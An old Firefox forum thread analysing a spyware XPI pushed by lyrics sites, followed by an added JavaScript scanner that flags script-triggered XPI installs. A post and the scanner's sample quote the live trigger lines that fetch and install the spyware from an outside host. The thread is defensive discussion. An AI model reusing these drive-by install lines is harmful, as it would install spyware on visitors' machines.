MozillaZine

We got another XPISpyware

Discussion of general topics about Mozilla Firefox
esavior

Posts: 1211
Joined: July 29th, 2003, 1:57 pm

Post Posted April 3rd, 2004, 9:53 am

http://www.musicsonglyrics.com/T/Thursd ... lyrics.htm

It's there alright. I could only get it to pop up once, but after digging through the source, it's in an external js file.
It grabs the XPI from:
http://www2.flingstone.com/cab/sbc_netscape.xpi
You can find the code in the 4th external script call, the one with all the characters. I would just paste it here but I don't know the legality in pasting their code.
Mindjunk
I didn't hear no bell...

arch

Posts: 85
Joined: May 4th, 2003, 8:58 am

Post Posted April 3rd, 2004, 10:47 am

I poked around xpi a bit. Here's the summary:

The XPI contains sbc_netscape.exe; it installs a program called Bridge, which hijacks IE. Associated somehow with www.blazefind.com.
"No good deed goes ever unpunished"
http://archonon.sytes.net

chapas

Posts: 186
Joined: March 22nd, 2004, 12:37 pm
Location: Buenos Aires, Argentina

Post Posted April 3rd, 2004, 11:24 am

Oh the irony....an xpi for mozilla to hijack IE. I hope Fx can't be hijacked as easily as IE. And now we have to get serious about what to do with these malicious XPIs T__T

AnonEmoose
 
Posts: 2031
Joined: February 6th, 2004, 11:59 am

Post Posted April 3rd, 2004, 11:34 am


esavior

Posts: 1211
Joined: July 29th, 2003, 1:57 pm

Post Posted April 3rd, 2004, 2:01 pm

Mindjunk
I didn't hear no bell...

logan

Posts: 3453
Joined: May 22nd, 2003, 3:51 pm
Location: NGC 2403

Post Posted April 3rd, 2004, 6:06 pm

chapas wrote:Oh the irony....an xpi for mozilla to hijack IE. I hope Fx can't be hijacked as easily as IE. And now we have to get serious about what to do with these malicious XPIs T__T


unless someone blindly changes the xpinstall.* defaults, it's not a problem.

Thesh

Posts: 370
Joined: October 15th, 2003, 12:30 am

Post Posted April 3rd, 2004, 7:27 pm

logan wrote:unless someone blindly changes the xpinstall.* defaults, it's not a problem.


I disagree, there are people who hit accept for everything. The best solution is to simply disable it by default as per Bug 234068. This does not mean we shouldn't take further measures like having signed controls and making it so you can only install by clicking a link (both current bugs) as well as whitelists and blacklists.

nexx

Posts: 736
Joined: July 29th, 2003, 1:23 am
Location: Brisbane, Australia

Post Posted April 3rd, 2004, 7:38 pm

iirc recent builds don't allow xpi installation unless the user specifically clicks on a link, so they won't pop up when a page loads.
Extensions are a key part of Firefox, and disabling them by default because a few sites may install spyware will probably cause more pain. Users will turn on xpiinstall to install their extensions and leave it on anyway.
Office XP Menus: http://users.bigpond.net.au/nexx1/oxpmenu/ || Unofficial Firefox Branding: http://scragz.com/tech/mozilla/firefox-unofficial-branding.php

esavior

Posts: 1211
Joined: July 29th, 2003, 1:57 pm

Post Posted April 3rd, 2004, 9:27 pm

I actually agree with the disable by default... the people that turn it on and leave it on most likely understand what extensions are... at least enough to know that they need to turn that option on. What I am concerned about is the newb user who, the first time they see that popup, is on a spywared site and won't know what to do; they may just press install. Try to remember that most people won't know what or even use extensions once fx starts getting mass deployment, everyone here uses extensions but we aren't average users.
Mindjunk
I didn't hear no bell...

MonkeeSage

Posts: 1011
Joined: December 20th, 2002, 8:15 pm

Post Posted April 3rd, 2004, 10:48 pm

I'd like to see a message box like AnonEmoose suggested, something along the lines of...

"This page is attempting to install [software name] on your computer using the Mozilla Installer. Software is potentially dangerous and can cause damage to your computer. In order to minimize the potential risk, you should only install software you have requested, from vendors you trust. If you understand this and wish to continue the installation, press INSTALL. If you do not understand this or did not request the software, press CANCEL."

...with the 'critical' icon on the prompt.


Shelumi`El
Jordan

S.D.G
"[M]en are usually satisfied with bad argument only when their convictions rest on other grounds." --John Oman

wildman

Posts: 222
Joined: June 20th, 2003, 12:20 pm
Location: Florida

Post Posted April 4th, 2004, 4:15 pm

theshooter wrote:
logan wrote:unless someone blindly changes the xpinstall.* defaults, it's not a problem.


I disagree, there are people who hit accept for everything. The best solution is to simply disable it by default as per Bug 234068. This does not mean we shouldn't take further measures like having signed controls and making it so you can only install by clicking a link (both current bugs) as well as whitelists and blacklists.

Well said & it's worth repeating. We can thank Micro$oft again for some of the bad habits users develop, very few MS drivers are signed by MS so folks just tend to accept everything despite the warning. Signed Packages with md5sums, Approved Sources (white/black lists), and legitimate Quality Controls on mirrors which scan for virus/spyware/malware infections on the software they distribute. There are several similar threads in these forums. Here is one I wrote to try & summarize the problems with extensions from a sysadmin's point of view...

Extension Manager with AutoUpdate - MozillaZine Forums
http://forums.mozillazine.org/viewtopic.php?t=63373

wildman

Posts: 222
Joined: June 20th, 2003, 12:20 pm
Location: Florida

Post Posted April 4th, 2004, 5:24 pm

I submitted the following to the devs at SpybotS&D via this link...
SpybotS&D: Contact - Detections
http://www.safer-networking.org/index.p ... detections
Name: wildman, Email address: guess_or_pm_me@pobox.com
Email subject: Mozilla/Firefox XPI apps
Report file: http://www2.flingstone.com/cab/sbc_netscape.xpi

Hope you can find the time to visit the MozillaZine Forums & participate in this discussion...

We got another XPISpyware - MozillaZine Forums - http://forums.mozillazine.org/viewtopic.php?t=66531

...and possibly support/contribute anti-spyware solutions to their project in the form of a SpyBot plugin/extension.

I made a similar comment on a Moz related blog recently, that may interest you.

Robert Accettura: Spyware Blaster Supports Mozilla
http://robert.accettura.com/archives/000347.shtml

esavior

Posts: 1211
Joined: July 29th, 2003, 1:57 pm

Post Posted April 5th, 2004, 7:49 am

Just had it pop up at another site, same spyware though
http://www.lyricsdomain.com/2/brand_new/
Mindjunk
I didn't hear no bell...

Kraftwerk

Posts: 106
Joined: April 2nd, 2004, 3:04 pm

Post Posted April 5th, 2004, 8:15 am

nexx wrote:iirc recent builds don't allow xpi installation unless the user specifically clicks on a link, so they won't pop up when a page loads.

I'm using the 20040403 build and it still tries to install.. :/
there's some kind of stupid script trying to do that I guess, it's not in the html itself (I think)..

esavior

Posts: 1211
Joined: July 29th, 2003, 1:57 pm

Post Posted April 5th, 2004, 9:01 am

Aye, it's an external script,

tries
InstallTrigger.install({'Free Access Plugin 1.117' : 'http://www2.flingstone.com/cab/sbc_netscape.xpi'});
and if that fails
location.replace('http://www2.flingstone.com/cab/sbc_netscape.xpi');
}

and I am using the newest build and still it's happening.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7b) Gecko/20040404 Firefox/0.8.0+ (mmoy-O2-GL7-SSE2-crc32-gifalloc)
Mindjunk
I didn't hear no bell...
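
The two-step trigger quoted in the post above (an InstallTrigger.install call, then a location.replace fallback to the same .xpi) combined with the whitelist idea raised earlier in the thread, as an added example that is not part of the original thread or of Mozilla's code. The names ALLOWED_HOSTS, findXpiTriggers and blockedFindings and the host addons.example.org are hypothetical, and the scan assumes the script text has already been deobfuscated.

```javascript
// Added example: flag script-initiated XPI installs whose host is not allowlisted.
// ALLOWED_HOSTS, findXpiTriggers and blockedFindings are hypothetical names.
const ALLOWED_HOSTS = new Set(['addons.example.org']); // constructed allowlist

// The object literal passed to InstallTrigger.install({...}).
const INSTALL_CALL = /InstallTrigger\.install\s*\(\s*\{([^}]*)\}/g;
// 'Display Name' : 'url' pairs inside that literal.
const PAIR = /(['"])(.*?)\1\s*:\s*(['"])(.*?)\3/g;
// The fallback: navigating the page straight to a .xpi URL.
const NAV_FALLBACK = /location\.(?:replace|assign)\s*\(\s*(['"])([^'"]+\.xpi)\1/g;

function hostOf(url) {
  try { return new URL(url).hostname; } catch (e) { return null; }
}

function findXpiTriggers(scriptText) {
  const findings = [];
  for (const call of scriptText.matchAll(INSTALL_CALL)) {
    for (const pair of call[1].matchAll(PAIR)) {
      findings.push({ kind: 'InstallTrigger', name: pair[2], url: pair[4] });
    }
  }
  for (const nav of scriptText.matchAll(NAV_FALLBACK)) {
    findings.push({ kind: 'navigation', name: null, url: nav[2] });
  }
  // Unparseable URLs get host null and are treated as not allowed.
  return findings.map(f => {
    const host = hostOf(f.url);
    return { ...f, host, allowed: host !== null && ALLOWED_HOSTS.has(host) };
  });
}

function blockedFindings(scriptText) {
  return findXpiTriggers(scriptText).filter(f => !f.allowed);
}

// Sample input: the two calls quoted in the post, plus one constructed
// install from the allowlisted host.
const SAMPLE = `
InstallTrigger.install({'Free Access Plugin 1.117' : 'http://www2.flingstone.com/cab/sbc_netscape.xpi'});
location.replace('http://www2.flingstone.com/cab/sbc_netscape.xpi');
InstallTrigger.install({'Example Theme' : 'https://addons.example.org/theme.xpi'});
`;

console.log(blockedFindings(SAMPLE));
```
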
